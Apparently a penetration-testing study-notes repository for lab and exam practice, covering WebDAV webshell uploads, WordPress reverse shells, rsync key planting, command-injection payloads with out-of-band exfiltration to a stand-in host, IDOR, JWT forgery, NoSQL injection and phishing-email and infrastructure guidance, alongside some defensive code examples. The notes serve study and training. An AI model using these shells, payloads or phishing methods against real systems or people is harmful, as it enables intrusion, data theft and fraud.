kali@kali:~/Documents/offsec/oscp/proving_grounds/Hutch$ cadaver 192.168.71.122
Authentication required for 192.168.71.122 on server `192.168.71.122':
Username:
Password:
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx
Uploading /usr/share/webshells/aspx/cmdasp.aspx to `/cmdasp.aspx':
Progress: [=============================>] 100.0% of 1400 bytes succeeded.
# Navigate to the cmdasp.aspx file in the browser
# Can then create a reverse shell payload with msfvenom, upload that using dav,
# then call it from the cmdasp.aspx page using the full path
```

### davtest

```bash
davtest --url http://
davtest -move -sendbd auto -url http://:8080/webdav/
```

--------------------------------------------------------------------------------
/pentesting-network/80-443-http-s/wordpress.md:
--------------------------------------------------------------------------------

# WordPress

## Enumeration

### Interesting Files

* wp-content
* wp-content/plugins
  * Check this directory even if `wpscan` doesn't identify any installed plugin
  * May not work though; check the source code of blog pages
* wp-admin
* wp-config.php
* wp-trackback.php
* wp-login.php

```
-rwxr-xr-x 1 www-data www-data 405 Feb 6 2020 index.php
-rwxr-xr-x 1 www-data www-data 19915 Jan 1 2021 license.txt
-rwxr-xr-x 1 www-data www-data 7346 Sep 30 00:41 readme.html
-rwxr-xr-x 1 www-data www-data 7165 Jan 21 2021 wp-activate.php
drwxr-xr-x 9 www-data www-data 4096 Nov 10 14:18 wp-admin
-rwxr-xr-x 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
-rwxr-xr-x 1 www-data www-data 2328 Feb 17 2021 wp-comments-post.php
-rwxr-xr-x 1 www-data www-data 3769 Nov 8 17:01 wp-config.php
drwxr-xr-x 6 www-data www-data 4096 Feb 9 22:51 wp-content
-rwxr-xr-x 1 www-data www-data 3939 Jul 30 2020 wp-cron.php
drwxr-xr-x 25 www-data www-data 16384 Nov 10 14:18 wp-includes
-rwxr-xr-x 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php
-rwxr-xr-x 1 www-data www-data 3900 May 15 2021 wp-load.php
-rwxr-xr-x 1 www-data www-data 45463 Apr 6 2021 wp-login.php
-rwxr-xr-x 1 www-data www-data 8509 Apr 14 2020 wp-mail.php
-rwxr-xr-x 1 www-data www-data 22297 Jun 1 2021 wp-settings.php
-rwxr-xr-x 1 www-data www-data 31693 May 7 2021 wp-signup.php
-rwxr-xr-x 1 www-data www-data 4747 Oct 8 2020 wp-trackback.php
-rwxr-xr-x 1 www-data www-data 3236 Jun 8 2020 xmlrpc.php
```

### Scanning

#### nmap

```bash
nmap -sV --script=http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users -p80
```

#### wpscan

```bash
# Basic Scan
wpscan --url http://10.10.248.119 -o wpscan.log
# Enumerate vulnerable plugins, themes, and users
wpscan --url http://10.10.248.119 -e vp,vt,u -o wpscan.log --api-token <>
# Aggressive Mode
wpscan --url http://10.10.192.249 -e vp --plugins-detection aggressive
# Brute Forcing Login
wpscan --url http://10.10.128.156 -U users.txt -P /usr/share/wordlists/rockyou.txt -vv
```

## Exploitation

### Plugins

* Can add a modified WordPress plugin header to the top of the reverse shell file
* Upload the reverse shell plugin as a zip file

#### Responsive Thumbnail Slider

* Using 'php/webapps/37998.txt' we can follow the steps from within the file.
* Responsive Thumbnail Slider --> Manage Images --> Add New
* Create a file called shell.php.jpg with the below contents:
  * ``
* With Burp Intercept on, upload the file and send the request to Repeater
* Modify the filename from shell.php.jpg to shell.php and send the modified request
* Turn off Intercept; back on the web page it should show "New image added successfully"
  * There are two new image entries (initial request and Repeater request)
* Clicking on the webshell entry brings us to a new page and gives the link to the image
* Clicking the link brings us to the file and we can now get command execution
  * By appending `?cmd=id`
* Now get a reverse shell by updating the payload value
  * `?cmd=/bin/bash -c "bash -i>& /dev/tcp//4444 0>&1"`
  * Note: It may have to be URL encoded

### Themes Templates

#### 404.php

* Edit the 404.php template to include a reverse shell payload
  * Appearance --> Theme Editor
  * Select 404 Template from the right side pane
  * Linux
    * Copy the contents of /usr/share/webshells/php/php-reverse-shell.php and replace the contents of the 404.php template
    * Update the attacker machine IP and port as necessary
    * Then click on the Update File button
  * Windows
    * Copy the contents of /usr/share/webshells/php/qsd-php-backdoor.php and replace the contents of the 404.php template
    * Generate an msfvenom payload and upload it to a directory
    * Execute the payload from the main page calling the absolute path
* Start a netcat listener
* Try executing by visiting a page that doesn't exist
  * `http://demo.ine.local/i-dont-exist`
  * And a reverse shell connection is made
* Try navigating to the 404.php file location
  * http://\/wordpress/404.php

--------------------------------------------------------------------------------
/pentesting-network/873-rsync.md:
--------------------------------------------------------------------------------

# 873 (rsync)

## Enumeration

### Banner

#### nc

```bash
nc -vn 873
```

### Modules

#### nmap

```bash
sudo nmap -sV --script "rsync-list-modules" -p 873
```

#### Metasploit

```bash
msf> use auxiliary/scanner/rsync/modules_list
```

### rsync

Unauthenticated

```bash
rsync -av --list-only rsync://192.168.76.126/fox
rsync -av rsync://192.168.76.126/fox ./rsync/
```

Authenticated

```bash
rsync -av --list-only rsync://username@192.168.0.123/fox
rsync -av rsync://username@192.168.0.123:8730/fox ./rsync_shared
```

Upload a file (e.g. an `authorized_keys` file to obtain access to a machine)

```bash
mkdir .ssh
ssh-keygen -f .ssh/fox-ssh -t ecdsa -b 521
cp .ssh/fox-ssh.pub .ssh/authorized_keys
rsync -av .ssh/ rsync://fox@192.168.76.126/fox/.ssh
```

## Brute Force

```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873
```

--------------------------------------------------------------------------------
/pentesting-network/88-kerberos.md:
--------------------------------------------------------------------------------

# 88 (Kerberos)

## Enumeration

### Authenticated

#### Kerbrute

```bash
/opt/kerbrute/kerbrute_linux_amd64 userenum --dc 10.10.86.5 -d lab.enterprise.thm /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -o users.txt
/opt/kerbrute/kerbrute_linux_amd64 passwordspray --dc -d intelligence.htb users.txt
```

GetUserSPNs

```
kali@kali:~/ctf/tryhackme/enterprise$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.55.72 LAB.ENTERPRISE.THM/nik
```

--------------------------------------------------------------------------------
/pentesting-network/9200-9300-elasticsearch.md:
--------------------------------------------------------------------------------

# 9200, 9300 (Elasticsearch)

--------------------------------------------------------------------------------
/pentesting-web/authentication.md:
--------------------------------------------------------------------------------

# Authentication

## PortSwigger

[https://portswigger.net/web-security/authentication](https://portswigger.net/web-security/authentication)

## PortSwigger Labs

### Password-based login

[https://portswigger.net/web-security/authentication/password-based](https://portswigger.net/web-security/authentication/password-based)

#### Username enumeration via different responses (Apprentice)

> This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password. To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.
* Navigated to the Login page
* Entered generic credentials (test:test)
* Error returned "Invalid username"
* We can determine a valid username by brute-forcing using a wordlist in Burp
* Opened Burp

#### Username enumeration via subtly different responses (Practitioner)

#### Username enumeration via response timing (Practitioner)

#### Broken brute-force protection, IP block (Practitioner)

#### Username enumeration via account lock (Practitioner)

#### Broken brute-force protection, multiple credentials per request (Expert)

### Multi-factor authentication

[https://portswigger.net/web-security/authentication/multi-factor](https://portswigger.net/web-security/authentication/multi-factor)

#### 2FA simple bypass (Apprentice)

#### 2FA broken logic (Practitioner)

#### 2FA bypass using a brute-force attack (Expert)

### Other Authentication Mechanisms

[https://portswigger.net/web-security/authentication/other-mechanisms](https://portswigger.net/web-security/authentication/other-mechanisms)

#### Password reset broken logic (Apprentice)

#### Password reset poisoning via middleware (Practitioner)

#### Password brute-force via password change (Practitioner)

#### Brute-forcing a stay-logged-in cookie (Practitioner)

#### Offline password cracking (Practitioner)

--------------------------------------------------------------------------------
/pentesting-web/burp-suite.md:
--------------------------------------------------------------------------------

# Burp Suite

## Burp Suite Certified Practitioner

How to Prepare

[https://portswigger.net/web-security/certification/how-to-prepare](https://portswigger.net/web-security/certification/how-to-prepare)

Hints and Guidance

[https://portswigger.net/web-security/certification/exam-hints-and-guidance](https://portswigger.net/web-security/certification/exam-hints-and-guidance)

## Server-side topics

### SQL Injection

### Authentication

### Path traversal

### Command injection

### Business logic vulnerabilities

### Information Disclosure

### Access control

### File upload vulnerabilities

### Race conditions

### Server-side request forgery (SSRF)

### XXE injection

### NoSQL injection

### API Testing

### Web cache deception

## Client-side topics

### Cross-site scripting (XSS)

### Cross-site request forgery (CSRF)

### Cross-origin resource sharing (CORS)

### Clickjacking

### DOM-based vulnerabilities

### WebSockets

## Advanced topics

### Insecure deserialization

### Web LLM attacks

### GraphQL API vulnerabilities

### Server-side template injection

### Web cache poisoning

### HTTP Host header attacks

### HTTP request smuggling

### OAuth authentication

### JWT attacks

### Prototype pollution

### Essential skills

--------------------------------------------------------------------------------
/pentesting-web/command-injection/README.md:
--------------------------------------------------------------------------------

# Command Injection

### How to Find

#### Black-Box Testing

* Map the application (using Burp)
* Identify all instances where the web application appears to be interacting with the underlying operating system
* Fuzz the application
  * Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`.
* For in-band command injection, analyze the response of the application to determine if it's vulnerable.
* For blind command injection, you need to get creative.
  * Trigger a time delay using the ping or sleep command.
  * Output the response of the command in the web root and retrieve the file directly using a browser.
  * Open an out-of-band channel back to a server you control.

#### White-Box Testing

* Perform a combination of black-box and white-box testing
* Map all input vectors in the application.
* Review source code to determine if any of the input vectors are added as parameters to functions that execute system commands.

### How to Exploit

#### In-band

* Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`.
* Concatenate another command
  * `127.0.0.1 && cat /etc/passwd &`
  * `127.0.0.1 & cat /etc/passwd &`
  * `127.0.0.1 || cat /etc/passwd &`

#### Blind

* Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`.
* Trigger a time delay.
  * `127.0.0.1 && sleep 10 &`
  * `127.0.0.1 ping -c 10 127.0.0.1 &`
* Output the response of the command in the web root and retrieve the file directly using a browser
  * `127.0.0.1 & whoami > /var/www/static/whoami.txt &`
* Open an out-of-band channel back to a server you control.
  * `127.0.0.1 & nslookup asdfjkl.web-attacker.com &`
  * ``127.0.0.1 & nslookup `whoami` .asdfjkl.web-attacker.com &``

### Automated Exploitation Tools

* Burp Suite
* arachni
* OWASP Zap
* Wapiti
* acunetix
* w3af

### How to Prevent

The most effective way to prevent OS command injection vulnerabilities is to never call out to OS commands from application-layer code. Instead, implement the required functionality using safer platform APIs.
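The prevention advice in this section, shown side by side in code. This is an added example and not code from the original page: a "before" that builds a shell command string from user input (the pattern the metacharacters above exploit), a fix that uses the platform API with no shell at all, and a fallback for when an external command is unavoidable (argv list, no shell, allowlist validation first). The function names, the `SAFE_NAME` allowlist and the sample inputs are constructed for this example.

```python
"""Vulnerable vs. hardened handling of a user-supplied directory name.

Added example illustrating the prevention advice on this page. Function
names, the allowlist pattern and SAMPLE_INPUTS are constructed for it.
"""
import os
import re
import subprocess
import tempfile

# Constructed sample inputs: one benign name and two injection attempts
# built from the shell metacharacters listed above.
SAMPLE_INPUTS = ["reports", "reports; id", "reports && cat /etc/passwd &"]

# Allowlist: 1 to 32 characters drawn from letters, digits, '_' and '-'.
# Anything else (spaces, ';', '&', '|', '`', '$', '/', '..') is rejected.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def make_dir_vulnerable(base: str, name: str) -> str:
    """The insecure 'before': returns the string that system() would hand to
    /bin/sh. Everything after the name is parsed as shell syntax, so
    'reports; id' runs a second command. Never execute this pattern."""
    return f"mkdir {base}/{name}"


def make_dir_api(base: str, name: str) -> str:
    """Preferred fix: validate, then use the platform API (os.makedirs)."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected directory name: {name!r}")
    path = os.path.join(base, name)
    os.makedirs(path, exist_ok=True)
    return path


def make_dir_subprocess(base: str, name: str) -> str:
    """If an external command is unavoidable: validate, then pass an argv
    list with shell=False so the name is a single literal argument."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected directory name: {name!r}")
    path = os.path.join(base, name)
    subprocess.run(["mkdir", "-p", "--", path], check=True)
    return path


def run_demo() -> dict:
    """Feed every sample input to the hardened API version and report the
    outcome per input ('created' or 'rejected')."""
    base = tempfile.mkdtemp()
    outcome = {}
    for name in SAMPLE_INPUTS:
        try:
            outcome[name] = "created" if os.path.isdir(make_dir_api(base, name)) else "missing"
        except ValueError:
            outcome[name] = "rejected"
    return outcome


if __name__ == "__main__":
    for name in SAMPLE_INPUTS:
        print("shell would see:", make_dir_vulnerable("/srv/uploads", name))
    print(run_demo())
```

The allowlist is deliberately narrow: it is much easier to list the characters a directory name may contain than to enumerate every metacharacter the target shell understands, and it also rules out path traversal (`/` and `..` are not in the set).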
* For example: use `mkdir()` instead of `system("mkdir /dir_name")`

If it is required to perform OS commands using user-supplied input, then strong input validation must be performed.

* Validate against a whitelist of permitted values.
* Validate that the input has the expected form (for example a number or a simple alphanumeric string).

--------------------------------------------------------------------------------
/pentesting-web/idor-insecure-direct-object-reference.md:
--------------------------------------------------------------------------------

# IDOR (Insecure Direct Object Reference)

## IDOR

[https://portswigger.net/web-security/access-control/idor](https://portswigger.net/web-security/access-control/idor)

Insecure direct object references (IDOR) are a type of [access control](https://portswigger.net/web-security/access-control) vulnerability that arises when an application uses user-supplied input to access objects directly.

## Examples

### Database Objects

Customer number used directly as a record index in queries performed against a database.

`https://insecure-website.com/customer_account?customer_number=132355`

### Static Files

Text file on the server-side filesystem where an attacker can modify/increment the filename.

`https://insecure-website.com/static/12144.txt`

### User ID

User ID value that an attacker could potentially change to view other users' information.

`http://online-service.thm/profile?user_id=1305`

### User ID Address

Typical request and response that we may be able to manipulate

```yaml
https://example.com/api/user/167865/address

Response:
{
  "id":167865,
  "username":"nahamsec",
  "address":"1234 another street"
}
```

Let's say we change the ID...
```yaml
https://example.com/api/user/1/address

Response:
{
  "id":1,
  "username":"admin",
  "address":"1234 another street"
}
```

We may be able to access other users' resources.

### User ID Profile

Capture the PUT request for modifying/updating a user.

```yaml
PUT https://example.com/api/user/profile HTTP/1.1

{
  "id":167865,
  "username":"nahamsec",
  "address":"me@gmail.com"
}

Response:
{"success":"true"}
```

If we know the ID for admin or another user, we can try to overwrite that user's record with values we control.

```yaml
PUT https://example.com/api/user/profile HTTP/1.1

{
  "id":1,
  "username":"nahamsec1",
  "address":"me+1@gmail.com"
}

Response:
{"success":"true"}
```

## Finding IDORs

### Encodings

Check to see if any data being passed is encoded (e.g. base64), then try to decode it.

`eyJpZCI6MzB9` --> `{"id":30}` --> tamper --> `{"id":10}` --> encode --> `eyJpZCI6MTB9` --> Submit

### Hashes

Check to see if any data being passed is hashed; try to identify the hash, then try to crack it.

### Unpredictable IDs

If the ID cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the ID numbers between them. If you can view the other user's content using their ID number while still being logged in with a different account (or not logged in at all), you've found a valid IDOR vulnerability.

### Locations

The vulnerable endpoint you're targeting may not always be something you see in the address bar. It could be content your browser loads in via an AJAX request or something that you find referenced in a JavaScript file.
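The missing check behind every IDOR example on this page is the same one: the server looks up the object by the ID the client supplied and never asks whether that object belongs to the authenticated user. The following is an added example, not code from the original page, that models the `/api/user/<id>/address` read and the `PUT /api/user/profile` write from above with an in-memory table and a session object; the `USERS` records, the `Session` class and the handler names are constructed for this example.

```python
"""Object-level authorization for the address read and profile write shown above.

Added example, not the page's own code. USERS, Session and the handler
functions are constructed for illustration.
"""
from dataclasses import dataclass

# Constructed records mirroring the ids used on this page.
USERS = {
    1: {"username": "admin", "address": "1234 another street"},
    167865: {"username": "nahamsec", "address": "1234 another street"},
}


class Forbidden(Exception):
    """Caller does not own the requested object (would be an HTTP 403)."""


@dataclass
class Session:
    user_id: int  # set by the authentication layer, never taken from the request


def get_address_vulnerable(session: Session, requested_id: int) -> dict:
    """IDOR: trusts the id in the URL and never compares it with the session."""
    return {"id": requested_id, **USERS[requested_id]}


def get_address_secure(session: Session, requested_id: int) -> dict:
    """Fix: the requested object must belong to the authenticated user."""
    if requested_id != session.user_id:
        raise Forbidden(f"user {session.user_id} may not read user {requested_id}")
    return {"id": requested_id, **USERS[requested_id]}


def update_profile_vulnerable(session: Session, body: dict) -> dict:
    """IDOR on write: the client-supplied 'id' picks which record is overwritten."""
    USERS[body["id"]].update(username=body["username"], address=body["address"])
    return {"success": "true"}


def update_profile_secure(session: Session, body: dict) -> dict:
    """Fix: the target record comes from the session; a body id that does not
    match the session is rejected rather than silently honoured."""
    if "id" in body and body["id"] != session.user_id:
        raise Forbidden(f"user {session.user_id} may not modify user {body['id']}")
    USERS[session.user_id].update(username=body["username"], address=body["address"])
    return {"success": "true"}


def run_demo() -> dict:
    """Replay the page's scenario as user 167865 against both handler variants."""
    me = Session(user_id=167865)
    other_profile = {"id": 1, "username": "nahamsec1", "address": "me+1@gmail.com"}
    out = {}
    out["secure_read_own"] = get_address_secure(me, 167865)["username"]
    try:
        get_address_secure(me, 1)
        out["secure_read_other"] = "allowed"
    except Forbidden:
        out["secure_read_other"] = "forbidden"
    out["vulnerable_read_other"] = get_address_vulnerable(me, 1)["username"]
    try:
        update_profile_secure(me, other_profile)
        out["secure_write_other"] = "allowed"
    except Forbidden:
        out["secure_write_other"] = "forbidden"
    out["admin_after_secure_write"] = USERS[1]["username"]
    update_profile_vulnerable(me, other_profile)
    out["admin_after_vulnerable_write"] = USERS[1]["username"]
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Note that the secure write does not even need the client to send an `id`: the record to update is already known from the session, which is why dropping the field from the API is the cleanest fix when the object is always the caller's own.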
Sometimes endpoints could have an unreferenced parameter that may have been of some use during development and got pushed to production. For example, you may notice a call to **/user/details** displaying your user information (authenticated through your session). But through an attack known as parameter mining, you discover a parameter called **user_id** that you can use to display other users' information, for example, **/user/details?user_id=123**.

--------------------------------------------------------------------------------
/pentesting-web/jwt-attacks.md:
--------------------------------------------------------------------------------

# JWT Attacks

## Exploiting JWT Flaws

### Check for Sensitive Data

JWTs are just base64-encoded data that can be easily decoded at [https://jwt.io/](https://jwt.io/).

Look for any sensitive or interesting information.

### Arbitrary Signature

> If the code is using `jwt.verify`, the secret key will need to be obtained (cracked) to use when attempting to send a modified payload data request, i.e. replacing the username with admin.
>
> If the code is using `jwt.decode`, the secret key will not be needed (or can be anything), so modifying the payload data request and resending it will work if otherwise valid.

If the code is using the Node.js library `jsonwebtoken` with the `jwt.decode` function above, the `alg` header value can be modified from `RS256` to `HS256` and then the payload values can be modified, such as changing a standard user to an admin user.
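What separates `jwt.decode` from `jwt.verify`, and why the `alg` header must never be trusted, is easiest to see in a few lines of code. The block below is an added example, not the page's code and not the `jsonwebtoken` library's implementation: a minimal HS256 signer, a `decode_unverified` function that behaves like `jwt.decode` (parses, checks nothing), and a `verify_hs256` function that pins the expected algorithm server-side before checking the MAC. It covers both the "Arbitrary Signature" case above and the "No Signature" (`alg: none`) case that follows. The `SECRET`, the claims and the tampered tokens built in `run_checks` are constructed test inputs.

```python
"""Decode-vs-verify for HS256 JWTs, with the algorithm pinned server-side.

Added example, not the page's or the jsonwebtoken library's code. SECRET,
the claims and the tampered tokens in run_checks are constructed inputs.
"""
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"  # a real key must be long and random


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, key: bytes) -> str:
    """Issue a token: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        _b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def decode_unverified(token: str):
    """What jwt.decode does: return (header, payload) without checking anything.
    Any claim the client wrote is returned as-is."""
    h_b64, p_b64, _ = token.split(".")
    return json.loads(_b64url_decode(h_b64)), json.loads(_b64url_decode(p_b64))


def verify_hs256(token: str, key: bytes) -> dict:
    """What jwt.verify should do: pin the algorithm, then check the MAC.

    The expected algorithm is fixed here, not read from the token. Honouring
    whatever `alg` says is exactly what lets `none` and RS256->HS256 tokens
    through."""
    try:
        h_b64, p_b64, s_b64 = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    header = json.loads(_b64url_decode(h_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg: {header.get('alg')!r}")
    expected = hmac.new(key, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(p_b64))


def run_checks() -> dict:
    """Run verify_hs256 over a genuine token and two tampered ones and report
    the outcome per token."""
    genuine = sign_hs256({"sub": "wiener"}, SECRET)
    # Constructed tampered inputs of the kinds described on this page:
    # an `alg: none` header with an empty signature, and a payload re-signed
    # under a guessed key.
    alg_none = _b64url(b'{"alg":"none","typ":"JWT"}') + "." + _b64url(b'{"sub":"administrator"}') + "."
    wrong_key = sign_hs256({"sub": "administrator"}, b"secret")
    results = {}
    for name, tok in (("genuine", genuine), ("alg_none", alg_none), ("wrong_key", wrong_key)):
        try:
            results[name] = verify_hs256(tok, SECRET)["sub"]
        except ValueError as err:
            results[name] = f"rejected: {err}"
    # decode_unverified returns the forged claim without complaint.
    results["alg_none_unverified_sub"] = decode_unverified(alg_none)[1]["sub"]
    return results


if __name__ == "__main__":
    for name, outcome in run_checks().items():
        print(f"{name}: {outcome}")
```

The two defender takeaways are the two checks in `verify_hs256`: the accepted algorithm (and therefore the key type) is a server-side constant, and the comparison uses `hmac.compare_digest` rather than `==`.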
### No Signature

Similar to the example above, the `alg` header value can be set to `none` and then the payload values can be modified, such as changing a standard user to an admin user.

## Brute Forcing

### Cracking JWTs

If the JWT secret key can be cracked, that key can be used to sign the token, which allows the payload values to be modified, such as changing a standard user to an admin user.

#### jwt\_tool

[https://github.com/ticarpi/jwt\_tool](https://github.com/ticarpi/jwt\_tool)

```bash
jwt_tool '' --crack -d /opt/jwt_tool/jwt-common.txt
```

#### hashcat

```bash
# Dictionary attack
hashcat -a 0 -m 16500 jwt.txt passlist.txt
# Rule-based attack
hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule
```

## PortSwigger Labs

### JWT authentication bypass via unverified signature

* Logged in with standard credentials
* Attempted to access /admin but got unauthorized
* Intercepted the previous request, copied the JWT session cookie, and pasted it into jwt.io
* Modified the `alg` header value from `RS256` to `HS256`
* Modified the `sub` payload value from wiener to `administrator`
* Resent the request for /admin and successfully got access

### JWT authentication bypass via flawed signature verification

* Logged in with standard credentials
* Attempted to access /admin but got unauthorized
* Intercepted the previous request and sent it to Repeater
* Highlighted the payload part in the request and modified it using Inspector to set the `sub` value to `administrator`
* Highlighted the header part in the request and modified it using Inspector to set the `alg` value to `none`
* Resent the request for /admin and successfully got access

### JWT authentication bypass via weak signing key

* Logged in with standard credentials
* Attempted to access /admin but got unauthorized
* Intercepted the previous request and sent it to Repeater
* Copied the whole JWT session cookie and cracked the secret with hashcat
  * `hashcat -a 0 -m 16500 '' jwt.secrets.list`
* Copied the whole JWT session cookie and placed it into jwt.io, replacing the `sub` value of wiener with administrator and placing the cracked secret into the Verify Signature section
* Copied the whole encoded output of the above changes and placed it into the session cookie of the intercepted request
* Resent the request for /admin and successfully got access

## Appendix

### Resources

[https://portswigger.net/web-security/jwt](https://portswigger.net/web-security/jwt)

[https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)

### Other Tools

[https://github.com/brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker)

[https://github.com/jmaxxz/jwtbrute](https://github.com/jmaxxz/jwtbrute)

--------------------------------------------------------------------------------
/pentesting-web/nosql-injection.md:
--------------------------------------------------------------------------------

# NoSQL Injection

## Example

> Example using a login form for Admin Access with username and password

* Intercept the login request with a basic username and password.
* If the Content-Type and data are not in JSON form, they will have to be converted:
  * Manually, by changing Content-Type to `application/json`
  * Burp Extension 'Content Type Converter'
    * Then right-click in the request, select Content Type Converter, and select JSON
  * May still need to modify the data to use JSON format, e.g.:
    * Before: `username=admin@admin.com&password=password&redirectPage=`
    * After: `{"username": "admin@admin.com", "password": "password"}`
* Send the request to get some response
* Example payloads below:

```bash
# Grab the user where username is admin@admin.com and the password is not equal to blank
{"username": "admin@admin.com", "password": {"$ne":""}}
# ... and the password has a value greater than an empty string
{"username": "admin@admin.com", "password": {"$gt":""}}
```

## Payloads

[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)

--------------------------------------------------------------------------------
/pentesting-web/unrestricted-file-upload.md:
--------------------------------------------------------------------------------

# Unrestricted File Upload

### Scenarios

#### Blog comment where you can upload a photo

Copy the php-reverse-shell.php file and insert `GIF89a;` at the top of it:

```bash
GIF89a;
```

Enumerate the output.
## Fingerprinting Web Servers

### HTTPRecon

{% embed url="https://www.computec.ch/projekte/httprecon?s=download" %}

### NetSquare

{% embed url="https://www.net-square.com/httprint.html" %}

### Uniscan

```bash
uniscan -u
```

## Web Server Penetration using SQLmap

```bash
sqlmap -u https://admin-portal.europacorp.htb/ --forms --crawl=2 --dump
```

--------------------------------------------------------------------------------
/pentesting-web/xss-cross-site-scripting/README.md:
--------------------------------------------------------------------------------

# XSS (Cross-Site Scripting)

## Finding

### Reflected

### Stored

### DOM-based

## Exploiting

--------------------------------------------------------------------------------
/phishing/phishing-hiddeneye.md:
--------------------------------------------------------------------------------

# Phishing: HiddenEye

--------------------------------------------------------------------------------
/phishing/phishing.md:
--------------------------------------------------------------------------------

# Phishing

## Writing Convincing Phishing Emails

We have three things to work with regarding phishing emails: the sender's email address, the subject, and the content.

**The Sender's Address:**

Ideally, the sender's address would be from a domain name that spoofs a significant brand, a known contact, or a coworker. See the Choosing A Phishing Domain task below for more information on this.

To find what brands or people a victim interacts with, you can employ OSINT (Open Source Intelligence) tactics. For example:

* Observing their social media account for any brands or friends they talk to.
* Searching Google for the victim's name and rough location for any reviews the victim may have left about local businesses or brands.
* Looking at the victim's business website to find suppliers.
* Looking at LinkedIn to find coworkers of the victim.

**The Subject:**

You should set the subject to something quite urgent or worrying, or something that piques the victim's curiosity, so they do not ignore it and act on it quickly.

Examples of this could be:

1. Your account has been compromised.
2. Your package has been dispatched/shipped.
3. Staff payroll information (do not forward!)
4. Your photos have been published.

**The Content:**

If impersonating a brand or supplier, it would be pertinent to research their standard email templates and branding (style, logos, images, sign-offs etc.) and make your content look the same as theirs, so the victim doesn't suspect anything. If impersonating a contact or coworker, it could be beneficial to contact them first; they may have some branding in their template, have a particular email signature, or even something small such as how they refer to themselves. For example, someone might have the name Dorothy and their email is dorothy@company.thm, but in their signature it might say "Best Regards, Dot". Learning these somewhat small things can sometimes have quite dramatic psychological effects on the victim and convince them more to open and act on the email.
If you've set up a spoof website to harvest data or distribute malware, the links to this should be disguised using the [**anchor text**](https://en.wikipedia.org/wiki/Anchor\_text), changing it either to some text which says "Click Here" or to a correct-looking link that reflects the business you are spoofing, for example:

`Click Here`

`https://onlinebank.thm`

## Phishing Infrastructure

#### Domain Name

You'll need to register either an authentic-looking domain name or one that mimics the identity of another domain. See task 5 for details on how to create the perfect domain name.

#### SSL/TLS Certificates

Creating SSL/TLS certificates for your chosen domain name will add an extra layer of authenticity to the attack.

#### Email Server/Account

You'll need to either set up an email server or register with an SMTP email provider.

#### DNS Records

Setting up DNS records such as SPF, DKIM and DMARC will improve the deliverability of your emails and make sure they're getting into the inbox rather than the spam folder.

#### Web Server

You'll need to set up web servers or purchase web hosting from a company to host your phishing websites. Adding SSL/TLS to the websites will give them an extra layer of authenticity.

#### Analytics

When a phishing campaign is part of a red team engagement, keeping analytics information is more important. You'll need something to keep track of the emails that have been sent, opened or clicked. You'll also need to combine it with information from your phishing websites for which users have supplied personal information or downloaded software.

#### Automation and Useful Software

Some of the above infrastructure can be quickly automated by using the below tools.
#### GoPhish (Open-Source Phishing Framework)

[GoPhish](https://getgophish.com/) is a web-based framework to make setting up phishing campaigns more straightforward. GoPhish allows you to store your SMTP server settings for sending emails and has a web-based tool for creating email templates using a simple WYSIWYG (What You See Is What You Get) editor. You can also schedule when emails are sent and have an analytics dashboard that shows how many emails have been sent, opened or clicked.

#### SET (Social Engineering Toolkit)

The [Social Engineering Toolkit](https://www.trustedsec.com/tools/the-social-engineer-toolkit-set/) contains a multitude of tools, but some of the important ones for phishing are the ability to create spear-phishing attacks and deploy fake versions of common websites to trick victims into entering their credentials.

## Using GoPhish

## Droppers

Droppers are software that phishing victims tend to be tricked into downloading and running on their system. The dropper may advertise itself as something useful or legitimate such as a codec to view a certain video or software to open a specific file.

The droppers are not usually malicious themselves, so they tend to pass antivirus checks. Once installed, the intended malware is either unpacked or downloaded from a server and installed onto the victim's computer. The malicious software usually connects back to the attacker's infrastructure. The attacker can then take control of the victim's computer and use it to further explore and exploit the local network.
## Choosing A Phishing Domain

## Using MS Office in Phishing

## Using Browser Exploits

## Phishing Practical
--------------------------------------------------------------------------------
/post-exploitation/cleanup.md:
--------------------------------------------------------------------------------
# Cleanup

## Cleanup Overview

* Make the system/network as it was when you entered it
* Remove executables, scripts, and added files
* Remove malware, rootkits, and added user accounts
* Set settings back to original configurations
--------------------------------------------------------------------------------
